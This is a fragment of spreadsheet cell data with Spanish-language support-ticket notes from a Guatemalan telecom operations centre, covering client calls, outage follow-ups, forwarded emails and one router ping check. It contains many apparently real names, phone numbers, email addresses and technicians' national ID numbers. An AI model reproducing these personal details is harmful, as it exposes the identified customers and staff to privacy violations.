FECHA Y HORA LOCALES: 14/06/2022 11:45:45</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILSON HERNANDEZ AL  37639943   SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001083582
**</t>
  </si>
  <si>
    <t>F4600993</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE ESPAÑA 58343207 INDICA QUE SE PROGRAME VISITA PARA EL JUEVES 23 DE JUNIO
A LAS 10:00 AM || SE NOTIFICA A GESTOR **
-ID 1001264294
**</t>
  </si>
  <si>
    <t>F4600996</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE JULIO PEREZ, SE EL INDICA QUE SE DEBE REIVISAR EQUIPOS INTERNOS, MENCIONA QUE NO LOGRA IDENTIFICAR EL EQUIPO QUE PEGA CONTRA EL ROUTE HUAWEI DE CLARO, POR LO QUE SE LE SOLICITA CONTACTO DEL ENCARGADO DE IT, PROPORCIONA 49458455, ABEL ORTEGA, ENCARGADO DE REDES
3001060910
COLA:
NOMBRE: A: 36571015
NÚMERO: 36571015
DURACIÓN: 0:08:38
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 36571015
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 14/06/2022 10:19:02</t>
  </si>
  <si>
    <t>CLIENTE ABEL ORTEGA, INDICA QUE ESTARAN REVISANDO EQUIPOS Y QUE SE LE DEVUELVA LA LLAMADA DESPUES DE LAS 11:00 HORAS.
3001065196
COLA:
NOMBRE: A: 49458455
NÚMERO: 011 50249458455
DURACIÓN: 0:06:58
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50249458455
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 14/06/2022 10:28:27</t>
  </si>
  <si>
    <t>F4601001</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ESVIN NAVAS/CLIENTE; SE LE INDICA ENLACE AFECTADO POR CORTE DE FO, PERSONAL TÉCNICO EN SITIO, LA DEMORA SE DEBE A QUE ESTÁ LLOVIENDO EN SECTOR.</t>
  </si>
  <si>
    <t>F4601008</t>
  </si>
  <si>
    <t>SE HABLA CON EJECUTIVA DE CUENTA CECILIA GONZALES  QUIEN COMENTA QUE CONTRACTUALMENTE LOS E1 DEL MINISTERIO DE SALUD NO FUE RENOVADO EL CONTRATO Y ELLOS INDICARON QUE TIENEN NUEVO PROYECTO CON TIGO POR LO QUE LOS E1 SE ESTAN PORTANDO HACIA ESA COMPAÑIA Y A TODOS LOS E1 SE LES QUITO EL AVI, EL CLIENTE MINISTERIO DE SALUD NO HA INDICADO CUALES E1 SE QUEDARAN EN CLARO, POR LO QUE SI ALGUN E1 SE QUEDARÁ EN CLARO DEBEN TRATARLO ENTRE EJECUTIVO DE CUENTA Y EL REPRESENTANTE DEL MINISTERIO DE SALUD PARA LEVANTAR EL PERFIL EN AVI  Y HACER EL CONTRATO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050379867895
NÚMERO: 0050379867895
INICIO: HOY, 08:23
FIN: HOY, 08:26
DURACIÓN: 2:47
ID DE LLAMADA: 3001023030</t>
  </si>
  <si>
    <t>F4601011</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE VLADIMIR MOLINA 72222710 PARA VALIDAR CUAL ES EL PROBLEMA QUE ESTA PRESENTANDO EN EL SERVICIO, CLIENTE INDICA QUE EL PROBLEMA ES QUE NO PUEDE REALIZAR LLAMADAS YA QUE LE DA MENSAJE QUE ESTE NUMERO NO PERTENECE A AVI
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4601018</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE AMEZQUITA 55619060  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001080665</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS WINAQ 56159604 MENCIONA QUE ESTA OCUPADO Y NO PUEDE ATENDER POR LO QUE SOLICITA LLAMADA POR LA TARDE
-ID 3001080996</t>
  </si>
  <si>
    <t>F4601022</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ELMER SANCHEZ, QUIEN INDICA QUE YA ESCALO CON EL PROVEEDOR DE LA INDIA PARA QUE LE REVISEN LA PBX.
AUTORIZA EL CIERRE.
3001166118
COLA:
NOMBRE: A: 41544385
NÚMERO: 41544385
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 41544385
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:09:24</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE ELMER SANCHEZ SE LE DEMUESTRA QUE EL TELETEHCNO SE PUEDEN SACAR LLAMADAS Y SE VALIDA CON TRAZAS QUE PBX ESTA RECHAZANDO LA LLAMADA.  SE LE SOLICITA REINICIO DE LA PBX A LO QUE PIDE SE LE CONTACTE EN 20 MINUTOS.
3001093222
COLA:
NOMBRE: A: 41544385
NÚMERO: 011 50241544385
DURACIÓN: 0:03:39
ESTADO: CONECTADA
DETALLES: +50241544385
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 11:36:12</t>
  </si>
  <si>
    <t>SE HACE TRIPARTITA ENTRE TECNICO JUAN PAZ  Y CLIENTE ELMER.SANCHEZ
3001139296
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 5490
DURACIÓN: 0:00:10
ESTADO: CONECTADA
DETALLES: 5490
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 13:44:32</t>
  </si>
  <si>
    <t>TECNICO JUAN PAZ UBICANDO AUN DONDE LE INDICO EL CLIENTE QUE SE PUEDE PARQUEAR YA QUE  LO TIENEN QUE LLEVAR EN UN BUS INTERNO PARA LLEGAR AL PUNTO.
3001138135
COLA:
NOMBRE: A: 58269660
NÚMERO: 58269660
DURACIÓN: 0:00:37
ESTADO: CONECTADA
DETALLES: 58269660
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 13:41:13</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER.SANCHEZ 41544385 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001153445 - 3001153676</t>
  </si>
  <si>
    <t>F4601034</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCELA MARTINEZ 79930639 MENCIONA QUE EL INCONVENIENTE PERSISTE SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001082368</t>
  </si>
  <si>
    <t>F4601035</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN OCHOA 47213068 MENCIONA QUE NO CUENTA CON SALIDA A INTERNET, SE LE INDICA QUE A NIVEL DE CLARO SE OBSERVA OPERATIVO Y ESTABLE
CLIENTE SOLICITA LAS PRUEBAS POR CORREO
---- PTQ.MOCHOA@SYTDEPOT.CC  -----
-ID 3001084762</t>
  </si>
  <si>
    <t>F4601037</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 14 DE JUNIO DE 2022 13:35
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 8901937T | BANCO DE DESARROLLO RURAL, S.A. | ALCALDIA MUNICIPAL DE GUINEALES SALIDA A PANQUINEY, SANTA CATARINA IXHUATAN SOLOLA
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO  8901937T | BANCO DE DESARROLLO RURAL, S.A.  | ALCALDIA MUNICIPAL DE GUINEALES SALIDA A PANQUINEY, SANTA CATARINA IXHUATAN SOLOLA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
633744   MAURICIO ISMAEL LÓPEZ TROCOLI    DPI          2380622011905 58265964
710140   RONY ROMEO REYES SULA                   DPI          2337028651013 56168954
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4601038</t>
  </si>
  <si>
    <t>SE LLAMA A CIENTE DANIEL SUÑIGA 00506 88310406 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001124083</t>
  </si>
  <si>
    <t>F4601041</t>
  </si>
  <si>
    <t>1040 METROS  DESDE NODO EN 1 HILO Y EN EL OTRO 45 METROS CORTE DE FIBRA PARCIAL, PERSONAL DE PLEX A CARGO PARA RESOLVE INCIDENTE</t>
  </si>
  <si>
    <t>PERSONAL EN REPARACION DE FIBRA INDICAN SE LES LLAME NUEVAMENTE EN 35 MINUTOS</t>
  </si>
  <si>
    <t>TECNICOS EN SITIO A ESPERA DE QUE LLEGUE A APERTURAR ELCAJERO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, TRANSFIEREN CON LUIS BOSARREYES MENCIONA QUE SI CUENTAN CON ENERGIA EN PR, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001090427</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS BOSARREYES AL 41501980  INDICA QUE YA ESTARA LLEGANDO EL PERSONAL AL SITIO PARA ABRIR EL CAJERO PERO QUE SE LE INFORME AL TECNICO QUE LE HAGA TIEMPO **
-ID 3001263085
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, EN ESPERA DE RESPUESTA HORARIO DE ATENCION
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 15:16
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; LUIS BOSARREYES &lt;LBOSARREYES@5B.COM.GT&gt;
CC: LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: F4601041|| || 5B || ATM 4642 SUZUKI || ENLACE DOWN
BUENAS TARDES APRECIABLE CLIENTE.
SOLICITAMOS DE SU APOYO COORDINANDO VISITA PARA EL DIA DE MAÑANA A LAS 09:00HRS
CAJERO 4642_AVENIDA LA CASTELLANA 39-48 GUATEMALA_SUZUKI
DATOS DEL PERSONAL TÉCNIC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t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        		&lt;&lt;	9:40:00 A. M.
1/4	ELMER FLORES	58260888	2 HORAS	11:40:00
2/4	ALDO DIAZ	58261057	3 HORAS	12:40:00
3/4	RENE AGUSTIN	58261183	5 HORAS	14:40:00
4/4/	RODOLFO MORALES	58261609	6 HORAS	15:40:00</t>
  </si>
  <si>
    <t>F4601046</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 12:55
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; ANALISTA-SISTEMAS@ARS.COM.EC &lt;ANALISTA-SISTEMAS@ARS.COM.EC&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: F4601046 || 808100002T || TTPI SERVICIOS FINACIEROS Y OPERACIONALES S.A. (ARS GUATEMALA)
*-*-*-*-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDISON BARRIGA 993327940 SE VALIDA QUE EL NUMERO ES DE ECUADOR, NO SALE LA LLAMADA
-ID 3001071249</t>
  </si>
  <si>
    <t>F4601064</t>
  </si>
  <si>
    <t>SE LLAMA  A CENTRAL RESPONDEN PERO CORTAN LA LLAMADA
-ID 3001202203 - 3001202516</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN
-ID 3001210469</t>
  </si>
  <si>
    <t>F4601066</t>
  </si>
  <si>
    <t>F4601067</t>
  </si>
  <si>
    <t>SE LE INFORMA AL CLIENTE ALVARO PORTILLO 78554212 QUE SE PROCEDERÁ A COORDINAR LA VISITA TÉCNICA. ID DE LLAMADA: 3001117080</t>
  </si>
  <si>
    <t>F4601071</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN ORELLANA AL 44990369 CL SOLICITA QUE SE VALIDE PORQUE CUANDO SE VA LA LUZ EN EL SECTOR  SE QUEDA SIN SERVICIO HASTA QUE RESTABLECE INDICA QUE ENVIO UN CORREO CON LA INFORMACION DE LO QUE ESTA SOLICITANDO **
-ID 3001097850
**
**</t>
  </si>
  <si>
    <t>F4601073</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOEL PADILLA QUIEN VALIDA EL SERVICIO Y AUTORIZA EL CIERRE.
3001176062
COLA:
NOMBRE: A: 0050433564602
NÚMERO: 0050433564602
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: 0050433564602
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:38:31</t>
  </si>
  <si>
    <t>F4601085</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN COMENTA QUE NO ES NECESARIO LOS PERMISOS , Y QUE EL HORARIO DE ATENCION ESTA HASTA LAS 5:30 PM, CLIENTE SOLICITA VISITA LO MAS ANTES POSIBLE
3001146962
COLA:
NOMBRE: A: 50433907067
NÚMERO: 50433907067
DURACIÓN: 0:01:00
ESTADO: CONECTADA
DETALLES: 50433907067
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 14/06/2022 14:11:22</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN 33907067 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001197441</t>
  </si>
  <si>
    <t>F4601094</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDENIA AMBOTA 84239844 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001162669</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDENIA 84239844 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001206555</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA LLAMADA MAÑANA A PARTIR DE LAS 8 AM.</t>
  </si>
  <si>
    <t>**SE LLAMA A EDENIA AL 84239844 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001195797
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDENIA AMBOTA AL 84239844 INFORMA QUE ESTA EN EL SITIO || SE NOTIFICA A GESTOR **
-ID 3001102133
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDENIA AMBOTA AL 84239844 SE LLAMA NUEVAMENTE A CL PERO NO RESPONDE ENVIA A BUZON **
-ID 3001104703 - 3001104914
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDENIA AMBOTA AL 84239844 CLIENTE NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001126294
**</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE EDENIA 84239844 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001246488</t>
  </si>
  <si>
    <t>F4601108</t>
  </si>
  <si>
    <t>SE RECIBE RESPUESTA, VÍA CORREO POR PARTE DE CLIENTE, QUIEN INDICA QUE HAY FALLA DE ENERGÍA EN SITIO  , ASÍ MISMO INDICA QUE EL VALDARA A LA HORA DE REGREGAR LA ENERGÍA
DE: ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 16:00
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | IP2133018SV | BANCO DAVIVIENDA SALVADORENO S.A.
BUENAS TARDES ESTIMADOS,
AL PARECER HAY FALLA ELÉCTRICA EN LA ZONA. LE ESTARÉ INFORMANDO POSTERIORMENTE EN CASO DE QUE NO RESTABLEZCAN LOS SERVICIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 14:58
PARA: ERNESTO.RUBIO@DAVIVIENDA.COM.SV &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | IP2133018SV | BANCO DAVIVIENDA SALVADORENO S.A.
BUENA TARDE ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO , Y ASÍ MISMO PODERNOS BRINDAR LA FECHA Y HORA PARA LLEGADA DE LA VISITA TÉCNICA.
DIRECCIÓN.  EL CALVARIOAVENIDA SIMON BOLIVARUNA CUADRA DE ALCALDIA
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
00815933-2 10805 MANUEL GARCIA
04339969-2 10701 HECTOR IVAN
02400310-1 3796 EDGAR MAURICIO MONTOYA SANCHEZ
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726 INDICA QUE NO HAY NADIE EN SITIO, SOLICITA QUE SE REALIZE UNA MEDICION EXTERNA Y QUE EL YA ESTA GESTIONANDO A PERSONAL PARA QUE VERIFIQUEN EL ATM Y QUE CUANDO TENGA ALGUNA NOTICIA NO LO HARA SABER VIA CORREO **
-ID 3001123758
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ERNESTO RUBIO 77979726 NO RESPONDE || ENVIA A  BUZON || SE INTENTARA LUEGO **
-ID 3001107247
**</t>
  </si>
  <si>
    <t>F4601109</t>
  </si>
  <si>
    <t>CLIENTE ANGELICA NOS CONFIRMA SERVICIO OPERATIVO, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO AETHRA, SIN EMBARGO SE ENCUENTRA EN ALTO LA ESTAN APOYANDO CON UNA ESCALERA PARA REINICIAR EL EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE REINICIA EQUIPO SE OBSERVA QUE LEVANTA EL SERVICIO
GOBERNACIONDEP_CLIE&gt;CONFIG&gt;PORT# SHOW SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           UP       DOWN      100000000
ETHERNET       3              ETH-3           UP       UP        100000000
ETHERNET       4              ETH-4           UP       DOWN      100000000
ETHERNET       5              ETH-5           UP       DOWN      100000000
ETHERNET       6              ETH-6           UP       DOWN      100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
GOBERNACIONDEP_CLIE&gt;CONFIG&gt;PORT#
&lt;IPBAGTPBN1D1A10A02EIM4&gt;PING -VPN IP_PBX_ACCESO  10.72.252.73
  PING 10.72.252.73: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.72.252.73: BYTES=56 SEQUENCE=1 TTL=64 TIME=1 MS
    REPLY FROM 10.72.252.73: BYTES=56 SEQUENCE=2 TTL=64 TIME=1 MS
    REPLY FROM 10.72.252.73: BYTES=56 SEQUENCE=3 TTL=64 TIME=1 MS
    REPLY FROM 10.72.252.73: BYTES=56 SEQUENCE=4 TTL=64 TIME=1 MS
    REPLY FROM 10.72.252.73: BYTES=56 SEQUENCE=5 TTL=64 TIME=1 MS
  --- 10.72.252.73 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t>F4601118</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANTONY MONTUFAR AL 59234661 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001109963
**</t>
  </si>
  <si>
    <t>F4601121</t>
  </si>
  <si>
    <t>SE LLAMA A CILENTE GILBERT MACARIO-47697694 ##VIVO ## SE HA LLAMADO A CLIENTE  COMENTA QUE AUN NO TIENE AVANCES DE SU TECNICO ##PIDE LLAMADA A LAS 5:30 ##VIVO</t>
  </si>
  <si>
    <t>SE HABLA CON  CLIENTE GILBER MACARIO 47697694 SE LE COMENTA EL CASO, QUEDA ENTERADO. INIDCA QUE NO SE CIERRE TICKET POR SI REQUIERE APOYO- PIDE SE LE MARQUE A LAS 14 HORAS##
3001094341
COLA:
NOMBRE: A: 47697694
NÚMERO: 47697694
DURACIÓN: 0:01:39
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47697694
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 14/06/2022 11:38:20</t>
  </si>
  <si>
    <t>CLEINTE INDICA QUE TUVIERON PROBLEMAS DE ENERGIA, SE OSBERVA QUE CLIENTE NO POSEE LLAMADAS ENTRE EXTENSIONES, TAMPOCO SALIENTES ###  LAS LLAMADAS ENTRANTES NO LE APARECEN, PERO SI SUENA##
CLIENTE ESCALA CON SU CENTRAL ## ID 3001091930</t>
  </si>
  <si>
    <t>SE A CLIENTE EN LINEA ALEXA GABRIELA HERNANDEZ-50190058  ##
3001091930
COLA:
NOMBRE: A: 50190058
NÚMERO: 50190058
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 50190058
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 14/06/2022 11:29:51</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXA GABRIELA HERNANDEZ-50190058 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001208553</t>
  </si>
  <si>
    <t>F4601122</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SIN EMBARGO CLIENTE NO SE ENCUENTRA DISPONIBLE.-</t>
  </si>
  <si>
    <t>SE LLAMA A CL SIN EMBARGO NO RESPONDE, ADICIONAL A ELLO SE ENVIA CORREO A CENTRAL SOLICITANDO CONTACTOS
RE: ENLACE INESTABLE DE PALI INMACULADA ID: CONTR0001801808OC</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JURICIO LESCANO 71055258  ENVIA DIRECTO A BUZON
-ID 3001207347</t>
  </si>
  <si>
    <t>***--- CL COMPARTE PRUEBAS  SOLICITA MONITOREO ---**
DE: GERALD TORRES (VENDOR) [MAILTO:GERALD.TORRES@WALMART.COM]
ENVIADO EL: MIÉRCOLES, 15 DE JUNIO DE 2022 02:25
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; GERIZIM SINAI RAMIREZ CALDERON &lt;GERIZIM.RAMIREZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI INMACULADA ID: CONTR0001801808OC
BUENO DÍAS,
SEGÚN LO CONVERSADO, FAVOR DEJAR EN MONITOREO EL SERVICIO
+ ESTAREMOS ENVIANDO EVIDENCIA DE LOS TIEMPOS DE RESPUESTA AL PRESENTAR INCONVENIENTE.
+ADICIONAL ENVIÓ GRAFICA DE EVIDENCIA DEL HORARIO CON TIEMPO DE RESPUESTA ALTO.
+ACTUALMENTE VEMOS EL SERVICIO ESTABLE.
SLDS!
GT</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE DEL PR JURICIO LESCANO +506 72231489 SIGUE SIN  RESPONDER || SE INTENTARA LUEGO **
-ID 3001196878
**</t>
  </si>
  <si>
    <t>SE LLAMARA A CL PARA PRUEBAS DE PRIMER NIVEL--</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JEFFERSON ARCE AL 22437253  CONTESTA EL SEÑOR MALAQUIAS QUIEN BRINDA CONTACTO DEL PR JURICIO LESCANO 71055258 **
-ID 3001111453
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JURICIO LESCANO AL 71055258  NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001148486
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JURICIO LESCANO AL 71055258  NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 3001122789
**</t>
  </si>
  <si>
    <t>F4601127</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO ZELAYA 76823551 - 25211001 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE, PERO SOLICITA LLAMADA PARA LAS 18:00 HRS PARA VALIDAR EL FUNCIONAMIENTO
-ID 3001618978 - 3001619214 - 3001619586</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE CON EL DICTAMEN.
BUENAS TARDES,
ESTIMADO POR ESTE MEDIO SE ADJUNTA EL DICTAMEN SOLICITADO.
SALUDOS</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CC QUIEN COMUNICA AL CLIENTE Y SE LLEGO AL ACUERDO DE DAR SEGUIMIENTO EL DIA DE MAÑANA A PARTIR DE LAS 8:00AM
3001209579
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 0050322503355
NÚMERO: 0050322503355
DURACIÓN: 0:03:07
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050322503355
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 17:39:33</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN CONTESTAN EN RECEPCION, INDICAN QUE SE ESTA PERDIENDO EL AUDIO EN LAS LLAMADAS.
3001431073
COLA:
NOMBRE: A: 0050325211000
NÚMERO: 0050325211000
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 0050325211000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
